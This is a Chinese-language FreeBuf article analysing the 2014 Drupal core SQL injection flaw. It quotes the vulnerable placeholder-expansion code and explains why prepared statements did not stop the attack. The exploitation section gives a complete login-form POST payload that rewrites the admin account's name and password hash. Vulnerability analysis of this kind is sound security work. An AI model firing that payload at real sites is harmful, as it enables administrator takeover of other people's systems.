freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

DRUPAL SQL注入漏洞分析
2023-07-12 15:13:54
所属地 四川省

0x00 漏洞概述

2014年10月15日,德国安全研究者Stefan Horst(SE大神)发布重磅消息,全球三大CMS之一的Drupal核心代码出现SQL注入漏洞。

本着朝圣的心态,我去深入的分析了这个漏洞的成因以及利用。个人感觉这个漏洞可以说是打开了SQL注入的一扇新的大门,因为它直接呈现出预编译方法,并非SQL注入的绝对防御。

而在利用方面,我找到了一种利用这个SQL注入轻松RCE的方法,只需要两个HTTP请求哦!

0x01 漏洞根源

这个漏洞出现问题的地方在includes\database\database.inc文件中,代码如下所示:

protected function expandArguments(&$query, &$args) {
    $modified = FALSE;

    // If the placeholder value to insert is an array, assume that we need
    // to expand it out into a comma-delimited set of placeholders.
    foreach (array_filter($args, 'is_array') as $key => $data) {
      $new_keys = array();
      foreach ($data as $i => $value) {
        // This assumes that there are no other placeholders that use the same
        // name.  For example, if the array placeholder is defined as :example
        // and there is already an :example_2 placeholder, this will generate
        // a duplicate key.  We do not account for that as the calling code
        // is already broken if that happens.
        $new_keys[$key . '_' . $i] = $value;
      }

      // Update the query with the new placeholders.
      // preg_replace is necessary to ensure the replacement does not affect
      // placeholders that start with the same exact text. For example, if the
      // query contains the placeholders :foo and :foobar, and :foo has an
      // array of values, using str_replace would affect both placeholders,
      // but using the following preg_replace would only affect :foo because
      // it is followed by a non-word character.
      $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

      // Update the args array with the new placeholders.
      unset($args[$key]);
      $args += $new_keys;

      $modified = TRUE;
    }

    return $modified;
  }

这段代码是用来对传入数据库中的多个参数值进行预处理用的,因为Drupal对于SQL是会进行预编译处理的(传说中有效防止SQL注入的手段)。但是由于考虑不严,导致攻击者可以通过构造数组,操控数组中的索引key,在预编译之前破坏原有的SQL结构,造成SQL注入攻击。

简单解释下这个过程:

这个函数会对存在多个值的参数进行处理,来应对SQL中IN这样的语句。就像下面这样的SQL,如果name的值是多个,就需要对传入的参数进行进一步处理。

SELECT * FROM {users} where name IN (:name)

这个函数传入的args参数大概是这样的:

array(':name'=>array('user1','user2')));

函数首先会检测数组中的值是否也是数组,如果不是则跳过。将符合条件的数组key存入$key中,然后遍历value中的数组,将其中的值存入$new_key数组中,数组索引为$key+value数组中各个值的数字索引。

$new_keys[$key . '_' . $i] = $value;

这里引入了字符串拼接,将SQL注入的风险带入。原本它期待的数据是我们上面给出的那样,但是试想,如果value数组的索引key我们用字符串,而不是数字呢?就像这样:

array(':name'=>array('test -- ' => 'user1','test' => 'user2')));

那$new_keys的索引就会变成“name_test — ”了,带着这个问题我们接着看最关键的地方:

$query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

用刚刚生成的$new_key数组索引key引入到了预编译SQL语句中,这样的话SQL语句就会变成这样:

SELECT * FROM users WHERE name = :name_test -- , :name_test

在预编译前就引入了SQL注入问题!

0x02 漏洞利用

在pastebin上有人给出了一个利用Poc,利用登陆时的SQL语句进行注入,部分代码如下所示:

$password = trim($form_state['values']['pass']);
  if (!empty($form_state['values']['name']) && !empty($password)) {
    // Do not allow any login from the current user's IP if the limit has been
    // reached. Default is 50 failed attempts allowed in one hour. This is
    // independent of the per-user limit to catch attempts from one IP to log
    // in to many different user accounts.  We have a reasonably high limit
    // since there may be only one apparent IP for all users at an institution.
    if (!flood_is_allowed('failed_login_attempt_ip', variable_get('user_failed_login_ip_limit', 50), variable_get('user_failed_login_ip_window', 3600))) {
      $form_state['flood_control_triggered'] = 'ip';
      return;
    }
    $account = db_query("SELECT * FROM {users} WHERE name = :name AND status = 1", array(':name' => $form_state['values']['name']))->fetchObject();
    if ($account) {

而且由于Drupal使用的是PDO方式操作数据库,可以直接多语句查询,我们可以直接update或者inster一个管理员。

具体操作为,向登陆URL:?q=node&destination=node提交如下POST内容:

name[0 ;update+users+set+name='admin'+,+pass+=+'$S$CTo9G7Lx2mJrSyWmlh3NRTXL6AWJt35fzep9obyjkwezMHOgQf.s'+where+uid+%3d+'1';;#  ]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in

这样就可以将admin用户提升为管理员,并且密码设为P@55w0rd。

0x03 漏洞总结

这个漏洞简单直接的切入了对于使用预编译SQL语句方式防止SQL注入的软肋,即在预编译之前注入攻击语句。SE大神就是大神,这个漏洞完全对于SQL注入打开了一扇新的大门。

在利用方面Drupal悲催的使用PDO方式操作数据库,导致攻击者利用这个漏洞可以直接多语句操作数据库。自身超强的加密算法形同虚设,也为攻击者实现代码执行提供了多种便利。

漏洞小结

  1. 影响范围个人评价为“高”,全球知名的三大CMS之一,这影响力不用多说了。
  2. 危害性个人评价为“高”,此漏洞无需任何条件,便可实现远程代码执行。

防护方案

官方的修补方案还是很简单有效的,让该整型的整形,就这么简单:)。

# 漏洞 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录